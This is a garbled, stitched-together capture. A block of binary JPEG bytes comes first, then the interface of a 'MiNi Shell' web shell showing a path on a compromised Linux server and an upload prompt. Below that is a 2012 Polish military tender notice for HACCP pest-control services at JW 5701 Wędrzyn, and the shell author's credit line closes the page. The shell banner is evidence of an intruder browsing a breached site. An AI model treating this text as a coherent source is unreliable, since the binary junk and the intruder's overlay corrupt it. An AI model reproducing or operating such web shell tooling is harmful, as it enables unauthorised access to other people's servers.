JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120403/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120403/76189-N-2012.html

<p class="kh_header"><b>Wędrzyn: ŚWIADCZENIE USŁUG W ZAKRESIE PROFILAKTYKI W RAMACH DOBREJ PRAKTYKI HIGIENICZNEJ (HACCP) I ZWALCZANIA SZKODNIKÓW SANITARNYCH W OBIEKTACH ADMINISTROWANYCH PRZEZ JW. 5701 WĘDRZYN A OBSŁUGIWANYCH PRZEZ SEKCJE OBSŁUGI INFRASTRUKTURY W WĘDRZYNIE, MIĘDZYRZECZU I SKWIERZYNIE</b><br>
<b>Numer ogłoszenia: 76189 - 2012; data zamieszczenia: 03.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa 5701 Wędrzyn , 69-211 Wędrzyn, woj. lubuskie, tel. 95 7556236, faks 95 7556222.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Organizacyjna Skarbu Państwa podległa MON.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ŚWIADCZENIE USŁUG W ZAKRESIE PROFILAKTYKI W RAMACH DOBREJ PRAKTYKI HIGIENICZNEJ (HACCP) I ZWALCZANIA SZKODNIKÓW SANITARNYCH W OBIEKTACH ADMINISTROWANYCH PRZEZ JW. 5701 WĘDRZYN A OBSŁUGIWANYCH PRZEZ SEKCJE OBSŁUGI INFRASTRUKTURY W WĘDRZYNIE, MIĘDZYRZECZU I SKWIERZYNIE.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług w zakresie profilaktyki w ramach Dobrej Praktyki Higienicznej (HACCP) i zwalczania szkodników sanitarnych w obiektach administrowanych przez Jednostkę Wojskową 5701 Wędrzyn.
W zakres usługi w obiektach bloków żywieniowych w ramach Dobrej Praktyki Higienicznej (HACCP) wchodzi:
a) montaż urządzeń monitorujących w wyszczególnionych obiektach w ilości gwarantującej prawidłowe świadczenie usługi na podstawie powierzchni podanych w formularzu cenowym. Zamontowane przez Wykonawcę urządzenia monitorujące stanowią jego własność i po zakończeniu obowiązywania umowy zostaną przez niego zdemontowane.
b) monitoring aktywności szkodników (poprzez obsługę stacji deratyzacyjnych, detektorów owadów, pułapek żywołownych, pułapek feromonowych itp. z częstotliwością określoną w formularzu cenowym.
c) identyfikacja szkodnika,
d) zwalczanie szkodnika poprzez zabiegi dezynsekcji i deratyzacji,
e) ocena skuteczności zabiegów i działania korygujące.
f) prowadzenie dla każdego obiektu oddzielnie dokumentacji monitoringu zagrożeń sanitarnych ze strony szkodników.
g) wykonanie zabiegów dezynsekcji i deratyzacji, jeżeli wyniknie taka konieczność. Za wykonane zabiegi w Wykonawcy nie przysługuje dodatkowe wynagrodzenie. Przy wycenie usługi monitoringu zagrożeń sanitarnych ze strony szkodników należy uwzględnić ewentualne zabiegi jakie należy wykonać aby nie dopuścić do zagnieżdżenia się szkodników.
h) konserwacja lamp owadobójczych szt.7 stanowiących własność zamawiającego zainstalowanych w obiektach SOI Skwierzyna.
2. Dokumentacja o której mowa w pkt. 1f. powinna zawierać:
a) protokół z audytu wstępnego,
b) plan pomieszczeń z naniesionymi miejscami zainstalowania urządzeń służących do monitorowania aktywności szkodników.
c) harmonogram przeglądów urządzeń służących do monitorowania aktywności szkodników,
d) kartę monitoringu szkodników biegających,
e) kartę monitoringu szkodników latających,
f) kartę monitoringu gryzoni,
g) kartę wykonanych czynności,
h) kartę działań korygujących,
i) wykaz i charakterystyki stosowanych środków chemicznych,
j) kartę przeglądu i zabezpieczenia budynku - raport z inspekcji wizualnej,
k) kserokopię umowy regulującej współprace z firmą.
3. Dokumentacja monitoringu zagrożeń sanitarnych ze strony szkodników winna być zgodna z funkcjonującym w danym obiekcie ogólnym systemem HACCP opracowanym i zatwierdzonym do użytku przez Kierownika danego obiektu.
4. Dokumentacja stanowi własność Zamawiającego.
5. Zabiegi dezynsekcji należy wykonywać dwustopniowo. Pierwszy zabieg po uzgodnieniu terminu wykonania usługi, drugi zabieg obowiązkowo po upływie 2 tygodni od pierwszego zabiegu. Liczbę zabiegów dezynsekcji podana w formularzu cenowym należy interpretować następująco: 2 zabiegi = dwa cykle podwójne.
6. Zabiegi deratyzacji należy wykonywać za pomocą trutki wyłożonej na tacy oznakowanej znakiem i napisem ostrzegawczym z dołączoną informacją o użytym środku, substancji czynnej i antidotum.
7. Realizacja usługi odbywać się będzie z wykorzystaniem sił i środków Wykonawcy, na jego koszt i ryzyko w obiektach wyszczególnionych w formularzu cenowym, po wcześniejszym ustaleniu terminu telefonicznie lub pisemnie z wyznaczonym przedstawicielem Zamawiającego.
8. Potwierdzenia wykonania zabiegów dokonywał będzie użytkownik obiektu w miejscu wykonania usługi na druku potwierdzenia sporządzonym przez Wykonawcę.
9. Zastosowane przez Wykonawcę środki powinny posiadać atesty bezpieczeństwa i dopuszczenia do stosowania. Środki należy stosować zgodnie z deklarowanym przez producenta przeznaczeniem i sposobem użycia.
10. Na używane w trakcie realizacji usługi środki Wykonawca przedstawi Zamawiającemu karty charakterystyki.
11. Cena jednostkowa za 1m2 powierzchni w formularzu cenowym winna obejmować wszystkie możliwe składniki kosztów leżące po stronie Wykonawcy, tj. koszty dojazdu w celu realizacji usługi, wykonanie usługi, koszt użytych środków itp.
Przedmiotem zamówienia jest również prowadzenie monitoringu zagrożeń sanitarnych ze strony szkodników w obiektach zgodnie z załączonymi tabelami w formularzach cenowych.
W pełny zakres usługi wchodzi:
1. Montaż urządzeń monitorujących (określonych w opisach szczegółowych)
2. Monitoring aktywności szkodników (obsługa stacji deratyzacyjnych, detektorów owadów, lamp owadobójczych, pułapek żywołownych, pułapek feromonowych) - rodzaje urządzeń monitorujących wykazane są w formularzach cenowych
3. Identyfikacja szkodnika
4. Zwalczanie szkodnika (zabiegi dezynsekcji, deratyzacji)
5. Ocena skuteczności zabiegów i działania korygujące
6. Prowadzenie dokumentacji monitoringu zagrożeń sanitarnych ze strony szkodników
7. Zamontowane przez Wykonawcę urządzenia monitorujące muszą mieć trwałą obudowę i być zamocowane w sposób trwały do podłoża.
8. Zamawiający zastrzega sobie możliwość wyboru różnych terminów wykonania zabiegów w poszczególnych obiektach (oznacza to, że zabiegi nie muszą być wykonywane we wszystkich obiektach w jednym terminie ale w zależności od sezonowości wystąpienia szkodnika)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.92.10.00-9, 90.90.20.00-6, 90.92.30.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a) złożą oświadczenie o spełnianiu warunków określone w art. 44 ustawy Prawo zamówień publicznych oraz o braku podstaw  do wykluczenia - art. 22 ust.1  (wg wzoru zawartego w zał. nr 3 do SIWZ);
b) Aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru wystawiony (lub uaktualniony) przez odpowiedni,  uprawniony do ich wystawienia organ, nie więcej niż 6 miesięcy przed upływem terminu składania ofert, a w stosunku do osób fizycznych oświadczenia w zakresie art. 24 ust. 1 Pzp (wg wzoru zawartego w zał. nr 4 do SIWZ);

c) złożą aktualne zaświadczenia właściwego naczelnika Urzędu Skarbowego potwierdzającego, że Wykonawca nie zalega z opłacaniem podatków, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
d) złożą aktualne zaświadczenia właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
e) kserokopię świadectwa lub certyfikatu potwierdzającego przeszkolenie w przedmiocie HACCP w części DDD (potwierdzone przez Wykonawcę o ich aktualności na dzień składania ofert)
f) kserokopię świadectwa ukończenia kursu dopuszczającego do stosowania środków I klasy toksyczności , w przypadku gdy wykonawca będzie używał środków toksycznych (potwierdzoną przez Wykonawcę o jej aktualności na dzień składania ofert)

Opis  sposobu dokonywania oceny tych warunków:
Ocena wyżej wymienionych warunków zostanie dokonana na podstawie załączonych przez Wykonawcę oświadczeń i dokumentów. Zamawiający uzna warunki za spełnione w przypadku gdy Wykonawca dostarczy komplet żądanych dokumentów i  oświadczeń wypełnionych zgodnie z przedstawionymi w SIWZ załącznikami oraz załączy dokument, z którego wynikać będzie uprawnienie do podpisania oferty.
Zamawiający dokona oceny spełnienia powyższych warunków zgodnie z formułą spełnia-nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis  sposobu dokonywania oceny tego warunku: Zamawiający uzna warunek za spełniony w przypadku gdy Wykonawca złoży  oświadczenie wypełnione zgodnie z zał. nr 3 do SIWZ.
Zamawiający dokona oceny spełnienia powyższego warunku zgodnie z formułą spełnia-nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis  sposobu dokonywania oceny tego warunku: Zamawiający uzna warunek za spełniony w przypadku gdy Wykonawca złoży  oświadczenie wypełnione zgodnie z zał. nr 3 do SIWZ.
Zamawiający dokona oceny spełnienia powyższego warunku zgodnie z formułą spełnia-nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis  sposobu dokonywania oceny tego warunku: Zamawiający uzna warunek za spełniony w przypadku gdy Wykonawca złoży  oświadczenie wypełnione zgodnie z zał. nr 3 do SIWZ.
Zamawiający dokona oceny spełnienia powyższego warunku zgodnie z formułą spełnia-nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) kserokopię świadectwa lub certyfikatu potwierdzającego przeszkolenie w przedmiocie HACCP w części DDD (potwierdzone przez Wykonawcę o ich aktualności na dzień składania ofert)
2) kserokopię świadectwa ukończenia kursu dopuszczającego do stosowania środków I klasy toksyczności , w przypadku gdy wykonawca będzie używał środków toksycznych (potwierdzoną przez Wykonawcę o jej aktualności na dzień składania ofert)
3) wykaz środków wraz  z ich atestami wg zał. nr 5 do SIWZ</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.przetargi.army.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Jednostka Wojskowa 5701
69-211 Wędrzyn.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.04.2012 godzina 08:45, miejsce: Jednostka Wojskowa 5701
69-211 Wędrzyn
bud. nr 33, pok. nr 211 (kancelaria jawna).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com